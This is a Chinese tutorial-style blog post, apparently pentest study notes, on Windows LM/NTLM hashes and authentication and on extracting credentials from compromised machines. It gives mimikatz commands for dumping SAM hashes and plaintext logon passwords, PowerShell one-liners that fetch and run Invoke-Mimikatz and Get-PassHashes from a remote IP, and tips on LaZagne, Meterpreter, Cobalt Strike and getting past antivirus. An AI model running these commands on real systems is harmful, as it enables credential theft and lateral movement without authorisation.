windows hash简介

一、hash简介

1、Windows系统使用两种方法对用户的密码进行哈希处理。它们分别是LAN Manager(LM)哈希和

NT LAN Manager(NTLM)哈希

2、所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的

字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串

3、现在已经有了更新的NTLMV2以及Kerberos验证体系

4、Windows加密过的密码口令;我们称之为hash,windows的系统密码hash默认情况下一般由两部

分组成:第一部分是LM-hash,第二部是NTLM-hash(以:分隔)

默认使用的是NTLM的哈希值(知道LM的哈希就行)

格式:

5、windows认证基础

windows的认证包括三个部分:(此处自己去了解)

①本地认证:用户直接操作计算机登录账号(平时登录)

1、用户输入密码

2、系统收到密码后将用户输入的密码计算成NTLM Hash

3、与sam数据库(安全账户管理器)(%SystemRoot%\system32\config\sam)中该用户的哈希比对

sam直接打是打不开的,需要安全模式或者其他方式,后续补充

4、匹配则登录成功,不匹配则登陆失败

5、NTLM哈希,是一种单向哈希算法,windows将用户的密码计算成NTLM哈希之后才存储在电脑。

6、本地认证中用来处理用户输入密码进程为lsass.exe,密码会在这个进程中明文保存,供该进程

将密码计算成NTLM Hash与sam进行比对,我们使用mimikatz来获取的明文密码,便是在这个进

程中读取到的

简单的ntlm哈希可以进行解密

网址:md5在线解密破解,md5解密加密 (cmd5.com)

②网络认证:远程连接到工作组中的某个设备(远程ftp,文件共享)

③域认证:登录到域环境中的某个设备

二、系统用户密码凭证获取

1、凭证获取工具

①mimikatz(此处是2.0)

读取系统的密码和解密特定的加密的密码 

win10下载地址:Releases · gentilkiwi/mimikatz (github.com)(可以不下载源码,下第二个)

一般都是非交互式,除非你拿到这个shell,传了此软件后,再交互执行

本地非交互式凭证获取:

直接以管理员权限运行mimikatz(交互式)

交互式测试可以按照①依次执行查看效果(拿到NLTM hash去尝试进行解密(不一定可解))

后期可以利用hash值横向渗透

privilege::debug    token::list

①mimikatz.exe "log rs.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

获取明文密码:

②mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords"  "exit"

后面执行结果写入rs.txt   进行提权(调试模式:需要管理员权限)  sam数据库中获取hash值

1.0版本命令:

privilege:debug   //提升权限

inject:process lsass.exe sekurlsa.dll    //注入sekurlsa.dll 到lsass.exe 进程里

@getLogonPasswords     //获取密码

②powershell脚本

远程加载m脚本(获取系统当中明文密码)此方法不推荐使用

powershell lEX (New-Object Net.WebClient).DownloadString(http://47.101.214.85:8000/Invoke-MimikatZ.ps1');Invoke-Mimikatz -DumpCreds

别名 创建对象为Net.webClient   方法  (脚本存放位置:此处为vps服务器上) ;分隔 调用命令执行(请求vps脚本去加载)

python3 -m http.server 8080(用于测试和开发,在服务器的指定端口开启一个服务)

不知道命令作用含义可以 get-help  参数+百度翻译

powershell的基本使用(自己去了解)比cmd强大一点

脚本要会看
powershell lEX(new-object net.webclient)downloadstring(http://47.101.214.85:8000/Get-PassHashes.ps1');Get-PassHashes

列出了当前NTLM的哈希和lm的哈希

③wce

下载地址:Releases · returnvar/wce (github.com)Amplia Security - Research - Windows Credentials Editor (WCE)

方法2:kali中文件下载到windows机器中

kali中自带有/usr/share/windows-resources/wce,可以在kali中开个http服务,供下载

到需要开启下载的目录 ,这里以wce为示例:

cd   /usr/share/windows-resources/wce

python3   -m  http.server 11111(在11111号端口开启http服务)

此时可以在windows中访问 192.168.129.132:11111//usr/share/windows-resources/wce

此时就可以进行下载

ctrl+c退出服务(不放心可以netstat -anltup | grep 11111)

软件运行不了(后期再看)下载地址:Releases · returnvar/wce (github.com)

④pwddump7

下载地址:https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump7.zip

也运行不了

⑤ophcrack

下载地址:OphCrack 下载 |SourceForge.net

网站破解不了哈希值的话,配合彩虹表破解

彩虹表:

https://ophcrack.sourceforge.io/tables.phphttp://project-rainbowcrack.com/table.htm

⑥procdump+mimikatz

下载地址:ProcDump - Sysinternals | Microsoft Learn

微软的(有签名)可以绕过杀软

procdump lass进程导出

mimikatz执行需要免杀

⑦注册表导出hash

⑧lazagne

LaZagne.exe   all

⑨meterpreter获取哈希(功能多,掉了不好搞) 

hashdmp

需要管理员权限get  system提权 之后直接执行hashdump里边也集成了mimikatz模块

⑩cobaltsritle获取哈希(cs方便一点)

得到shell会话后(不建议调为0容易被发现查杀)

b里边执行就行

例如在cs中通过upload上传wce到目标机器上(指定目录)

shell PwDump7.exe>1.txt

一、hash简介

二、系统用户密码凭证获取


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/340725.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

mysql中InnoDB存储引擎的Buffer Pool

大家好。众所周知,对于使用InnoDB作为存储引擎的表来说,不管是用于存储用户数据的索引(包括聚簇索引和二级索引),还是各种系统数据,都是存储在磁盘上的。在处理客户端的请求时,当需要访问某个页…

Wireshark Lua插件入门

摘要 开发中经常通过抓包分析协议,对于常见的协议如 DNS wireshark 支持自动解析,便于人类的理解,对于一些私有协议,wireshark 提供了插件的方式自定义解析逻辑。 1 动手 废话少说,直接上手。 第一步当然是装上wiresh…

守护景区安全:探讨景区视频监控方案的搭建及必要性

据新闻报道,5月25日,安徽黄山景区内发生雷击,闪电击中飞来石景点的护栏,多人被碎石砸中受伤。景区工作人员表示,飞来石附近本就属于雷区,当天曾发过两次雷电预警。 随着旅游业的繁荣发展,越来越…

内存管理【C++】

内存分布 C中的内存区域主要有以下5种 栈(堆栈):存放非静态局部变量/函数参数/函数返回值等等,栈是向下增长的【地址越高越先被使用】。栈区内存的开辟和销毁由系统自动执行 堆:用于程序运行时动态内存分配&#xff…

Element ui 快速入门(基础知识点)

element ui官网 前言: 在当今时代,我们在编写计算机程序时,不仅仅是写几个增删改查的简单功能,为了满足广大用户对页面美观的需求,为了让程序员们写一些功能更简便,提高团队协作效率,所以eleme…

Audio PsyChat:web端语音心理咨询系统

这是一个在服务器本地运行的web语音心理咨询系统,咨询系统内核使用PsyChat,我们为其制作了Web前端,并拼接了ASR和TTS组件,使局域网内用户可以通过单纯的语音进行交互。其中ASR和TTS组件使用PaddleSpeech API。 使用 使用单卡3090…

C语言王国——字符函数和字符串函数(2)

目录 5 strtok函数 5.1 函数的表达式 5.2 函数模拟 6 strstr函数 6.1 函数表达式 7 strerror函数 7.1 函数表达式 7.2 例子 7.3 perror 8 strncpy、strncat、strncmp函数 四 结论 5 strtok函数 strtok函数我的理解是他是一个分割字符串的函数 5.1 函数的表达式 cha…

国联易安:网络反不正当竞争,要防患于未然

据市场监管总局官网消息,为预防和制止网络不正当竞争,维护公平竞争的市场秩序,鼓励创新,保护经营者和消费者的合法权益,促进数字经济规范健康持续发展,市场监管总局近日发布《网络反不正当竞争暂行规定》&a…

图解Mysql索引原理

概述 是什么 索引像是一本书的目录列表,能根据目录快速的找到具体的书本内容,也就是加快了数据库的查询速度索引本质是一个数据结构索引是在存储引擎层,而不是服务器层实现的,所以,并没有统一的索引标准,…

【分享】两种方法禁止修改Word文档

对于比较重要的Word文件,不想被随意编辑修改,可以试试以下两个方法,不清楚的小伙伴,一起来看看吧! 方法1:设置“只读方式” 我们可以给Word文档设置以“只读方式”打开,这样就算编辑修改了文档…

[数据集][目标检测]焊接处缺陷检测数据集VOC+YOLO格式3400张8类别

数据集格式:Pascal VOC格式YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):3400 标注数量(xml文件个数):3400 标注数量(txt文件个数):3400 标注…

用AI工具设计赛博朋克壁纸

用AI工具设计赛博朋克壁纸 今天我要向大家分享的项目十分直观且具有高流量,我坚信这会对大家有所帮助。我相信大家在壁纸创作者的作品中一定看过科幻和赛博朋克的元素,这些深具特色的未来科技主题的壁纸影响了现代设计的方向。 设计师们巧妙地运用了几…

鸿蒙HarmonyOS实战—如何使用Video组件播放视频

1.视频播放 鸿蒙系统中,关于视频播放,可以使用上层视频组件Video。 参数如下 src 支持file:///data/storage路径前缀的字符串,用于读取应用沙箱路径内的资源。需要保证目录包路径下的文件有可读权限。 说明:视频支持的格式是&am…

在Three.js中实现模型点击高亮:整合EffectComposer与OutlinePass的终极指南

效果【后期实现鼠标点击选中轮廓后给出一个弹窗显示相应的模型信息】 标签指示线参考我的上一篇文章 引言 Three.js不仅让WebGL的3D图形编程变得简单易懂,还通过其强大的扩展库支持丰富的后期处理效果,为3D场景增添无限魅力。本篇文章将引导您深入了…

实习面试题(答案自敲)、

1、为什么要重写equals方法,为什么重写了equals方法后,就必须重写hashcode方法,为什么要有hashcode方法,你能介绍一下hashcode方法吗? equals方法默认是比较内存地址;为了实现内容比较,我们需要…

使用from…import语句导入模块

自学python如何成为大佬(目录):https://blog.csdn.net/weixin_67859959/article/details/139049996?spm1001.2014.3001.5501 在使用import语句导入模块时,每执行一条import语句都会创建一个新的命名空间(namespace),并且在该命名…

词法分析器的设计与实现--编译原理操作步骤,1、你的算法工作流程图; 2、你的函数流程图;3,具体代码

实验原理: 词法分析是编译程序进行编译时第一个要进行的任务,主要是对源程序进行编译预处理之后,对整个源程序进行分解,分解成一个个单词,这些单词有且只有五类,分别时标识符、关键字(保留字&a…

CentOS7配置国内清华源并安装docker-ce以及配置docker加速

说明 由于国内访问国外的网站包括docker网站,由于种种的原因经常打不开,或无法访问,所以替换成国内的软件源和国内镜像就是非常必要的了,这里整理了我安装配置的基本的步骤。 国内的软件源有很多,这里选择清华源作为…

终于来啦!Stable Diffusion 3将在6月12日正式开源

6月3日晚,著名开源大模型平台Stability AI的联合首席执行官Christian Laforte,在AMD的产品发布会上宣布,文生图模型 Stable Diffusion 3将于6月12日在Hugging Face开源权重。 本次开源的是Stable Diffusion 3的Medium模型,有20亿…

Python中数字比较与获取较大值的深入解析

目录 一、引言 二、Python数字类型概述 三、数字比较操作符 四、获取较大值的逻辑与实现 五、高级话题:使用内置函数和库 六、性能分析与优化 七、案例分析 八、总结与展望 一、引言 在编程世界中,数字的比较和获取较大值是基础且常见的操作。P…